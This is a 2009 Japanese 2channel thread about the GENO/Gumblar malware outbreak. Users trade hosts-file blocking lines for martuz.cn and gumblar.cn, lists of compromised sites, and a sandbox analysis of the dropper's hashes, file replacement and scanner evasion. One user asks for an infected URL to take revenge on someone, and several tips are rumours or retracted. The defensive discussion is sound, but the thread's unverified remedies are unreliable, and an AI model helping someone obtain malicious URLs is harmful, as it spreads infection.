318:192.168.0.774
09/05/17 18:38:45 1tk6kEt+0
>>317
悪かったよぉ。>>269をコピペしちゃったんだよぉ。
319:192.168.0.774
09/05/17 18:39:36 kVP/8H1t0
手打ち職人の朝は早い。
320:192.168.0.774
09/05/17 18:39:49 4DIp3Q850
おい殺すぞ
>>225踏んでサブPC動かなくなった
殺人予告
>>225魔自己rろす
321:192.168.0.774
09/05/17 18:41:13 7TaPV4fL0
もしかして今GENOウイルスまとめサイト重い?
322:192.168.0.774
09/05/17 18:41:36 FkoNww+u0
>>318
今確認してきたら、GENOウィルスチェッカーのhostsファイルもgumlarになっとった。
323:192.168.0.774
09/05/17 18:42:05 Pub4l/uF0
gumblar.cnにしても同じだ。
zlkon.lvも
324:192.168.0.774
09/05/17 18:42:23 7TaPV4fL0
>>317,318
てことはここのも間違えている悪寒w
ここのサイトの人もしみてたら修正求む
URLリンク(geno.2ch.tc)
325:192.168.0.774
09/05/17 18:43:56 4DIp3Q850
頼む('A`)
誰か地獄少女にアクセスしたんだが404だ
代わりにGEOウィルスで復讐したいんでURLくれー('A')
326:192.168.0.774
09/05/17 18:45:08 1tk6kEt+0
>>323
有効なAレコードを消しちゃってる状態だから名前解決できないんでしょ。
327:192.168.0.774
09/05/17 18:47:09 QPPdxGJ80
>>313
もしよろしければ詳しく教えていただけないでしょうか?
328:192.168.0.774
09/05/17 18:49:30 kVP/8H1t0
NGID 4DIp3Q850 、と。よしスッキリ。
329:192.168.0.774
09/05/17 18:50:18 Pub4l/uF0
詳しくないけど、どちらも逆引き出来ないね。
URLリンク(safeweb.norton.com)
で評価が出ることと、DNSが有効化は別問題?
330:192.168.0.774
09/05/17 18:52:45 1PB83W/v0
? ? ? ? ? ? ? ? ? ?
? ? ? ? ? ? ? ? ? ?
? ? ? ? ? ? ? ? ? ?
? ? ? ? ('A`) ? ? ? ? なんだか無償にコピペしたくなる
? ? ? ? ? ? ? ? ? ?
? ? ? ? ? ? ? ? ? ? なのに初心者にはコピペできない
? ? ? ? ? ? ? ? ? ?
? ? ? ? ? ? ? ? ? ?
? ? ? ? ? ? ? ? ? ?
331:192.168.0.774
09/05/17 18:53:17 E5NPdo1R0
>>316
Shockwave player と Flash playerは別物。
ごっちゃにせず、目を見開いてよく読むこと。
332:192.168.0.774
09/05/17 18:53:35 1tk6kEt+0
>>329
評価した段階ではAレコード有効だったんだと思う。
で、Nortonの評価がグリーンになったところで再度アクティブに
なるかもしれん。
333:192.168.0.774
09/05/17 18:53:45 Dx3JCXno0
? ? ? ? ? ? ? ? ? ?
? ? ? ? ? ? ? ? ? ?
? ? ? ? ? ? ? ? ? ?
? ? ? ? ('A`) ? ? ? ? なんだか無償にコピペしたくなる
? ? ? ? ? ? ? ? ? ?
? ? ? ? ? ? ? ? ? ? なのに初心者にはコピペできない
? ? ? ? ? ? ? ? ? ?
? ? ? ? ? ? ? ? ? ?
? ? ? ? ? ? ? ? ? ?
334:192.168.0.774
09/05/17 18:56:04 Pub4l/uF0
つまりキャッシュ情報表示してたのね。
Nortonのは今日初めて使ったが、意味ないサービスだな
335:192.168.0.774
09/05/17 18:57:24 +UWQkKTW0
まとめサイトが感染したってマジ?
336:192.168.0.774
09/05/17 19:00:24 PGm7MFXg0
>>335
ソースはお前の頭ん中か?
337:192.168.0.774
09/05/17 19:02:16 f7PXip0E0
>>331
どっちもwikiで調べようとすると「Adobe Flash」ってページがでるから
同じ物なのかと思いましてw
adobe flashplayerだけ最新版にしとけばOKってことですよね?
338:192.168.0.774
09/05/17 19:02:19 +UWQkKTW0
>>336
いや、人づてに聞いただけ
事実じゃないならそれでいい
339:192.168.0.774
09/05/17 19:09:37 Rr9xCLR70
>>244
通常使うブラウザは火狐にしとけ。
340:192.168.0.774
09/05/17 19:10:00 DAUhxtRJ0
441 名前: ムラサキサギゴケ(catv?)[sage] 投稿日:2009/05/16(土) 23:32:08.96 ID:K/FFIX2k
・小林製薬【対策済】
・BIG-server.com【対策済】
・ウェルネス(医療情報提供企業)【対策済】
・薬事日報社【対策済】
・国交省中部地方整備局岐阜国道事務所【対策済】
・全日本民医連【対策済】
・総合ホビー展示即売会「ビコン」公式サイト【対策済】
・GENO(PC通販ショップ)【キャッシュ削除済】
・NHT紀尾井町グループ(自毛植毛斡旋企業)【対策済】
・SayMove!【対策済】
・ライブハウス「あさがやドラム」【対策済】
341:192.168.0.774
09/05/17 19:12:00 pC5ZVjuD0
Warning: fopen() [function.fopen]: Unable to access log/2009516.dat in /virtual/owata-net/public_html/owata-net.com/index.php on line 123
Warning: fopen(log/2009516.dat) [function.fopen]: failed to open stream: No such file or directory in /virtual/owata-net/public_html/owata-net.com/index.php on line 123
毎日チェックしてるサイトでこんなの表示されたけど意味がわからない。
Warning:とか出てるから気味悪いけどgenoと関係ないよね?
セキュ板にも貼ったけど荒れててダメっぽい!
342:192.168.0.774
09/05/17 19:14:49 7TaPV4fL0
チェッカーに通してみて
343:192.168.0.774
09/05/17 19:15:38 aydvb1+C0
「便所の落書き」「痰ツボ」と罵倒されてきた2ちゃんねるがGENOウィルス騒動の解決に
一番大きく貢献するまで、あと五日。
(「その時歴史が動いた」 2078年5月放送予定)
344:192.168.0.774
09/05/17 19:16:15 kuRpimDu0
>340
コピペにこんなこと言うのもなんだが
×総合ホビー展示即売会「ビコン」
○総合ホビー展示即売会「ホビコン」
ホビーコンプレックスの略でホビコンね。
345:192.168.0.774
09/05/17 19:18:44 6zykGUMd0
★11荒れすぎ w
346:192.168.0.774
09/05/17 19:20:41 4g69K7//0
★1~2スレあたりはセキュ板とν速がほとんどだったからね
同人・VIPから流れてきてひどいことになった
347:192.168.0.774
09/05/17 19:21:07 qd90in+R0
荒れてるか?
あれくらい大したことないと思うけど
348:192.168.0.774
09/05/17 19:26:28 NUScdqsg0
Chromeも対象になったのが出たとかニュー即で言われたり
背景黒いほうのwikiの「感染したと~」とアドレスがおかしいとかセキュ板で言われたり
またなんかいろいろ来たらしいけど結局どうなってんのこれ
349:192.168.0.774
09/05/17 19:28:52 OKDvuiXi0
IDも出ないセキュ板の情報なんて信用出来んわ
自演し放題だし
350:192.168.0.774
09/05/17 19:29:20 MP/sWvjo0
何か一行だけになっちゃったよチェッカーのところ。
■hostsファイル書き換え
hostsファイルに以下の行を追加
127.0.0.1 martuz.cn
ひょっとしてgumblar.cn zlkon.lv要らないの?
127.0.0.1 zlkon.lv
127.0.0.1 gumblar.cn
127.0.0.1 martuz.cn
351:192.168.0.774
09/05/17 19:30:07 qTLKsZ5C0
見れない=感染じゃなくて
ただの集中でアクセスできないだけでしょ
352:192.168.0.774
09/05/17 19:30:13 q9beek69O
セキュリティ板 GENOスレ11の9で紹介されていた、
ポート135, 445を閉じたらネットに繋げなくなった。
元に戻そうにもプロパティが表示されない。
デバイスマネージャーやサービスの画面を閉じようとすると
プロパティを閉じろと言われるけど、Alt+Tabで探しても見つからない。
それにコンパネの右半分が真っ白。データフォルダの方は正常に表示されるのに。
誰か助けてください。
353:192.168.0.774
09/05/17 19:32:01 6zykGUMd0
>>350
まだ安心できない
354:192.168.0.774
09/05/17 19:33:43 OKDvuiXi0
ESCなりALT+F4なりで全部終了させて再起動したのかね
右半分が真っ白とか一時的な描画異常なんて誰でも経験する事で
再起動すればまず直る
再起動しても同じというならシラネ
355:192.168.0.774
09/05/17 19:34:19 MP/sWvjo0
>>353
いや、漏れて来るのは解ってるんだけど・・・。
私のトリップは◆XcxlmnqGqUです←―この人何処にいるのかしら。
356:192.168.0.774
09/05/17 19:34:38 4g69K7//0
hxxp://skyhighpremium■com
ここもかな。チェッカーでは1000%とでた
アクセスしたくないし、ソースチェッカー規制くらってる
357:192.168.0.774
09/05/17 19:35:22 DAUhxtRJ0
>>344
・小林製薬【対策済】
・BIG-server.com【対策済】
・ウェルネス(医療情報提供企業)【対策済】
・薬事日報社【対策済】
・国交省中部地方整備局岐阜国道事務所【対策済】
・全日本民医連【対策済】
・総合ホビー展示即売会「ホビコン」【対策済】
・GENO(PC通販ショップ)【キャッシュ削除済】
・NHT紀尾井町グループ(自毛植毛斡旋企業)【対策済】
・SayMove!【対策済】
・ライブハウス「あさがやドラム」【対策済】
358:192.168.0.774
09/05/17 19:45:27 0KCBdJWL0
612 名前:名無しさん@お腹いっぱい。[sage] 投稿日:2009/05/17(日) 19:43:11 ID:I820zXBQ0
スレリンク(software板:611番)
611 名前:名無しさん@お腹いっぱい。[sage] 投稿日:2009/05/17(日) 19:30:30 ID:/KeDK9cs0
noscriptの「ブックマークから開いたサイトを許可する」って
履歴とブックマークの管理のウィンドウの履歴から開いても適用されるんだな
www.seibidoshuppan.co.jpここを開き直そうとしたらFlashが再生されたからうんこ漏らしたぜ・・・
martuz.cnを弾いてくれたから事なきだったけど
一応気になったからコピペ
そもそも「ブックマークから開いたサイトを許可する」はチェック入れるべきじゃないと思うけど
359:352
09/05/17 19:48:32 q9beek69O
>>354
それが再起動しても直らんのです。
書き忘れましたがOSは2kです。
携帯じゃ対応策調べようにもままならず…
些細なことでもいいんで、心当たりあれば教えてください。
360:192.168.0.774
09/05/17 19:50:13 7TaPV4fL0
>>358
サンキュー
361:192.168.0.774
09/05/17 19:51:58 4g69K7//0
>>358
^w^;
362:192.168.0.774
09/05/17 19:57:17 OKDvuiXi0
>>359
今内容見てきたがRemote Procedure Call停止って普通しないんじゃね?
そもそもあの内容が正しいかどうかも分からんから試す気にもならん
ただ135/445を閉じた方がいいのは事実なので自分はルータ側で閉じている
(と言うよりデフォルトで閉じられてたが)
元々あちらの板はID出ないし情報信用出来ないよ、見る価値無い
363:192.168.0.774
09/05/17 20:13:01 MpyKmePW0 BE:660438427-2BP(0)
なんだかいろいろご迷惑をおかけしております
>まとめ(黒)が見れない
急激にアクセス増えたので鯖が死にそうになってるみたいです
15時からの5時間でリファラーが2000件以上増えました
>メニューのリンクがおかしい
修正しました
364:192.168.0.774
09/05/17 20:17:00 4g69K7//0
>>188
AVG Anti-Virus Version 86
スレリンク(sec板:3番)
Q5. 2chのログにウィルスが検出されたんですけど
A5. ログに貼られたコードだけではPC内で感染行動をおこすことはできないので無害です。
AVG User Interface → ツール → 高度な設定 → 常駐シールド → 例外 に
ログフォルダを追加することで回避できます。
365:352
09/05/17 20:23:37 q9beek69O
>>362
ありがとうございます。いい勉強になりました… orz
迷惑ついでと言っては何ですが、この質問に適切な板を教えてもらえませんか?
板名からすると、PCサロン、windowsあたり?
366:192.168.0.774
09/05/17 20:24:12 zfzbOIpv0
>>363
とりあえず移転も検討してみたら?
URLリンク(wikiwiki.jp)
こことかに。解析も出来るみたい。
367:192.168.0.774
09/05/17 20:25:08 sDfaXn0wO
なぜGENOまとめWikiが劇重いんですか
368:192.168.0.774
09/05/17 20:27:26 sDfaXn0wO
>>363見て了解しました。無意味なレス消費して大変申し訳ないです。
369:192.168.0.774
09/05/17 20:28:09 OKDvuiXi0
>>365
この辺でいいんでない?
【マジレス】超初心者の質問に答えるスレ113【エスパー】
スレリンク(win板)
質問の基本だけど、何をしたかは勿論OSやその他環境等なるべく細かく書くようにね
その方が回答者も適切な回答を提示しやすいから
370:352
09/05/17 20:35:14 q9beek69O
>>369
スレまで誘導、ありがとうございます!
このご恩はどこかで誰かに返します。
371:192.168.0.774
09/05/17 20:40:21 MP/sWvjo0
2009 05/17 hostsファイルの古いドメイン二つを消去
martuz.cn一行でいいのね。もう旅に出ます。
372:192.168.0.774
09/05/17 21:14:42 W37Yk44D0
ちょっと気になるが、>>185は、どこで感染したんだ?
>>185の操作のみで感染したとなると、ちょっと不気味だ。
それとも、感染以外の単なるトラブルなのかな。
373:192.168.0.774
09/05/17 21:17:02 O8ZrwtGB0
有志が作って下さった
感染チェックツール
URLリンク(3rd.geocities.jp)
機能
1 ) cmd.exeの起動確認
2 ) regedit.exeの起動確認
3 ) sqlsodbc.chmのファイルサイズ確認
ZIPを解凍するとgeno.batが出て来るので、
それを実行すれば簡単に感染しているのかどうかチェックできる。
心配な人はgeno.batをメモ帳で開いてみれば安全なファイルだとわかります。
374:192.168.0.774
09/05/17 21:19:06 7TaPV4fL0
>>373
感染していた場合、cmd.exeを起動するのは危険とのことです。
375:192.168.0.774
09/05/17 21:23:32 O8ZrwtGB0
>>374
それただのネタだったみたい。
376:192.168.0.774
09/05/17 21:25:07 61lOiijw0
まさに情報の錯綜って感じだなオイ
377:192.168.0.774
09/05/17 21:25:21 7TaPV4fL0
そうだったんだ。
というわけなので、まとめサイトの人修正お願いします。
378:192.168.0.774
09/05/17 21:25:29 4g69K7//0
あぬビスレポート見ればわかるけど
感染してて、不発だった場合
手動でcmdを実行すると火がつく可能性がある
379:192.168.0.774
09/05/17 21:25:35 mNi/cx+s0
>>373
怖くて踏めない…
380:192.168.0.774
09/05/17 21:33:04 O8ZrwtGB0
>>379
安全だってば。
スクリーンショット
URLリンク(www.rupan.net)
381:192.168.0.774
09/05/17 21:35:16 U6FqnzDc0
>>363
ここに力を貸してもらえないか聞いてみたら?
幸せサーバープロジェクト 「アイデア・技術のある人募集中」★3
スレリンク(operate板)
382:192.168.0.774
09/05/17 21:36:30 M2s+iWsi0
>>379
これで何か起きた、って報告は聞かないから大丈夫w
383:192.168.0.774
09/05/17 21:37:11 WLY0wH0PO
>>373踏んだら感染した。
384:192.168.0.774
09/05/17 21:38:33 61lOiijw0
>>383
おせーよ携帯
385:192.168.0.774
09/05/17 21:38:50 O8ZrwtGB0
>>383
嘘はいけません。
386:192.168.0.774
09/05/17 21:41:40 N2pz4sCI0
なんともなかった
387:192.168.0.774
09/05/17 21:55:41 mNi/cx+s0
ほんとに? うう…
388:192.168.0.774
09/05/17 22:01:24 FwEBmaaZ0
正直ネット不慣れな俺には判別できんけど、ツール使わなくても確認はできるんだし安易に踏むべきじゃないのはわかる
389:192.168.0.774
09/05/17 22:17:19 xG23ce6c0
>>375
ネタだったのかよ
本当に錯綜って感じだな・・・結局大人しく暫くネットから離れてるのが正解か・・・
390:192.168.0.774
09/05/17 22:18:38 ++vAYPLj0
>>389
cmdの起動に問題があったこともあった
いまはしらん
391:192.168.0.774
09/05/17 22:19:30 BvZF1aRY0
亜種・新種が多すぎだからネタとも言い切れないのが困り物
392:192.168.0.774
09/05/17 22:23:00 FEBrgm5Z0
どっちにしろcmd実行で火噴いても、検出しても
クリーニンスコするだけだからいんじゃね
393:192.168.0.774
09/05/17 22:25:53 D2jCgTYH0
気が向くたびにcmd起動させては安全を確認している俺がいる。
ニフティの公式HPが感染のデマには心底焦ったからなぁ。
394:192.168.0.774
09/05/17 22:28:02 FEBrgm5Z0
ニフティのレンタル鯖だっけ?
395:192.168.0.774
09/05/17 22:29:58 hMuH46V60
正直怖くて、閲覧できません><
一応アドビは最新にしてるけど、やっぱりcmd起動してばっかりいるw
396:192.168.0.774
09/05/17 22:30:44 TTgW4pHv0
>>388
ツールつかったけど、しっかり使えたよ
山田チェッカー出たときも、こんな感じで疑心暗鬼だったのかもね
397:192.168.0.774
09/05/17 22:34:01 5b9h61kx0
sqlsodbc.chmのサイズが1,323
コマンドプロンプトとレジストリは開くんだけど・・・
このウィルスって感染してたら例えばどんな被害があるの?
まじ泣きそうなんだが
398:192.168.0.774
09/05/17 22:37:40 T9pTie3x0
>>337
okですよね、とかじゃなくて最新版に出来るならしておくもんですよ・・・
その面倒くさい精神が感染を招いてるのに不安で尚やらんってのは
他のが出てきたときにもくらかもよ
399:192.168.0.774
09/05/17 22:38:11 q8u6cZFi0
>>397
アウト
・ftpを介しての自サイトの改竄
・クレカ番号やID・Passの流出
・CPUの負荷の増大
ここら辺か?
クリーンインスコしてこい
400:192.168.0.774
09/05/17 22:38:11 BvZF1aRY0
自分のHP持ってなければ再起動した時点でPC終了、クリーンインストール以外の駆除手段無しって程度
HP持ってた場合気づかず更新するとそこがまた感染源に
401:192.168.0.774
09/05/17 22:38:51 N9SKEU4J0
検出スレから少し出張してきました。
スレリンク(sec板:963番) の一部自己転載です。
-----
え~、gnomeの人のおかげで挙動の予想がついてきたので、ちょっとexeの方を実行した時に
作成されるファイルを仮想PCで確保してみました。
ベンダーに提出するかどうかの判断は各自にお任せします。(一応、KasperskyとAVIRAには送ってあります。)
muvl.exe (元の名前 muvl.nug) - ランダム作成らしい。
MD5 : 3862b349b9b5c9283925e181ff9f5bf8
URLリンク(www.virustotal.com) (2/40)
sqlsodbc.chm - ただのダミーファイルです。(中身は無意味なテキストと空白)
MD5 : 34cd61d83853e511f0a28027f639a1c9
URLリンク(www.virustotal.com) (0/40)
muvl.exeは、中身に合わせて拡張子を変えてあります。(ベンダー提出時に捨てられないように)
gnomeの人の所の話では、一定時間毎に自己書き換えをして潜伏するそうなので、シグネチャで
対応できる可能性はかなり低そうですが、出さないよりはマシかもしれません。
sqlsodbc.chmの方はダミーファイルなので、マルウェアではありません。
感染すると、sqlsodbc.chmがこれに置き換えられるという意味で参考に添付してあります。
ファイルサイズは1,323バイトで、オリジナルファイルと置き換えられます。
あと、悪い話ですが、SymantecでもKasperskyでも、オンラインスキャンではコイツに感染していることがわかりません。
バッチリ感染した仮想PCをオンラインスキャンしてみたのですが、どちらも何も検出しませんでした。
このマルウェアは、感染時に元の実行ファイル(martuz.cnから落ちてくるxxxx.exe)の方を消去(証拠隠滅)
するようになっているので、一度感染すると、本体の自己書き換えもあるので、検出はほぼ不可能と思われます。
タチ悪すぎ...
402:192.168.0.774
09/05/17 22:41:35 sXGsF7Ez0
マジでか…
sqlsodbc.chmのサイズが変わらないって話もなかったっけ?
気のせい?デマ?
判断材料がないとかやばすぎる
403:192.168.0.774
09/05/17 22:42:06 7TaPV4fL0
しかし今までこの形式のウイルスが出てこなかった(のかな?)
のが不思議なのかもしれないね。
404:192.168.0.774
09/05/17 22:44:36 5b9h61kx0
>>399
>>400
ありがとう
実は4月ごろに変なPCサイト見てからIEが強制終了するようになって
システム復元したらなおったんだよね。でも現在Windows update
に繋がらないから変だとは思ってた。
とりあえず今日は回線切ってクリーンインストールする
クレカはもってないから大丈夫なのかな?
405:401
09/05/17 22:47:19 N9SKEU4J0
>>397
>401の通り、sqlsodbc.chmのサイズが1,323バイトは、思いっきりアウトです。
可哀想ですが、現状では感染後に検出・駆除できるソフトが無いので、データを退避の上
再インストールするしか...
私の方で確認した結果では、SymantecもKasperskyも、オンラインスキャンでは感染していることが
確認できません(感染していても、何も検出しない)ので、注意お願いします。
# 今、マイクロソフトのオンラインスキャンを確認中。 マイクロソフトでダメなら、オンラインスキャンでは
多分、何やっても検知できない。
406:192.168.0.774
09/05/17 22:48:32 Zy7kEHYt0
初歩的な質問で申し訳ないのですが……
ウイルス対策としてhostsファイルをNotepadで開いて「127.0.0.1 martuz.cn」等を
書き込もうとしたんですが、すでにファイルに書き込まれているホスト名はアルファベット順に
並んでいるのですが、書き込むホスト名もその中にアルファベット順にしたがって
書き込んだ方がいいのでしょうか?
407:192.168.0.774
09/05/17 22:48:54 FwEBmaaZ0
>>404
windows updateに繋がらないって時点でアウトだろ・・・
408:192.168.0.774
09/05/17 22:49:01 IyeP3TLN0
u.bat 今はe.batか。こいつは去年の秋ぐらいからあるみたい
readerの脆弱性指摘も去年の秋だったかな
genoウイルス感染報告は海外で今年3/18ぐらいだったかな
ソース探してくるのがめんどくさいがそんな感じだったと記憶してる
409:192.168.0.774
09/05/17 22:49:10 ++vAYPLj0
>>402
あったきがする
>>404
オンラインでIDパスワードを使うサービスを使用しているなら
クリーンインストール後に変更推奨
他に安全なPCがあるならそちらからすぐにでも変更推奨
410:192.168.0.774
09/05/17 22:51:04 IyeP3TLN0
190 名前:名無しさん@お腹いっぱい。[] 投稿日:2009/05/17(日) 01:51:35
>>178
>sqlsodbc.chmを書き換えて、何に転用しているかもよくわかってない。
ざっと見たところ、キーロガーのログ部分だね。おいらが見たのは反対からセーブしているやつだった。たとえば
あいうえお
は
おえういあ
って保存されてるよ。メモ帳なんかで開いてみれば、何が盗まれたかの一部はわかるんじゃないかな
411:192.168.0.774
09/05/17 22:51:08 sXGsF7Ez0
>>409
じゃあ感染しててもまったくわからないこともあるってことか…
鬱陶しいってレベルじゃねーぞこれ
412:192.168.0.774
09/05/17 22:52:46 IyeP3TLN0
感染してからsqlsodbc.chmをメモ帳を開けば面白いものが見れるのか?
413:192.168.0.774
09/05/17 22:52:58 FSY0bnP50
うっとおしさっていう点では、ここ数年稀に見るウイルスだな
414:274
09/05/17 22:53:26 7UVnacRX0
うっひょう、カスペなんかもダメなのか。
さっき(念の為)オンラインでフルスキャンしたばかりだと言うのに。
>1の症状らは皆無だし様子見るかな、avastがブロックしたと信じてw
415:192.168.0.774
09/05/17 22:53:45 mpI/NNW20
有志が作って下さった
感染チェックツール
URLリンク(3rd.geocities.jp)
機能
1 ) cmd.exeの起動確認
2 ) regedit.exeの起動確認
3 ) sqlsodbc.chmのファイルサイズ確認
ZIPを解凍するとgeno.batが出て来るので、
それを実行すれば簡単に感染しているのかどうかチェックできる。
心配な人はgeno.batをメモ帳で開いてみれば安全なファイルだとわかります。
チェック後の起動画面。
URLリンク(www.rupan.net)
416:192.168.0.774
09/05/17 22:53:59 rsd1W3Tn0
>>401
明らかに目立った不具合とかはありますか?
417:192.168.0.774
09/05/17 22:55:53 ++vAYPLj0
>>411
サイズがかわるかどうか怪しいからMD5とか確認しようって流れだった
いまはしらん
418:192.168.0.774
09/05/17 22:56:16 sDfaXn0wO
>>401
横レスですみませんが、
つまり、URLリンク(wepawet.cs.ucsb.edu)
などでソースを見たとき、martuz.cnやgumblar.cnが無くても感染の疑いがあるという事ですか?